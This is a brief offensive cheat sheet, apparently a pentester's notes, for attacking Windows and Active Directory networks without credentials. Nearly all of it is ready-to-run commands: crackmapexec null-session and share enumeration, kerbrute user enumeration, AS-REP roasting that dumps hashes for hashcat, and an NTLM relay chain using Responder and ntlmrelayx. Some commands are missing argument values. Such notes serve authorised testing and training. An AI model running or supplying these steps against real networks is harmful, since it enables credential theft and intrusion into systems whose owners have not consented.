w/o Creds

First enumeration
crackmapexec smb $RHOSTS
crackmapexec smb $RHOSTS --shares
crackmapexec smb $RHOSTS -u '' -p '' --shares # Null Session
crackmapexec smb $RHOSTS -u 'a' -p '' --shares
crackmapexec rdp $RHOSTS
crackmapexec winrm $RHOSTS
crackmapexec ldap $RHOSTS
crackmapexec wmi $RHOSTS

rpcdump.py | grep Provider | sort -u

Active Directory

If you have kerberos port open on a DC, you can try to list users
kerbrute userenum --dc --domain domain.com /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
Then try to AS-REP if you found users
GetNPUsers.py -debug 'domain.com/' -usersfile /tmp/users -outputfile /tmp/hashes.aspreroast -format hashcat -dc-ip

NetNTLM Relay

Responder will respond to any broadcast request (MDNS, LLMNR ..) and trigger authentification
ntlmrelayx will relay NetNTLMv2 auth to targets
possible targets are servers without SMB signature, cme (crackmapexec)
cme smb --gen-relay-list /tmp/targets.txt
ntlmrelayx.py -smb2support --no-http-server -ip -w -tf /tmp/targets.txt
sudo responder -I tun0 -w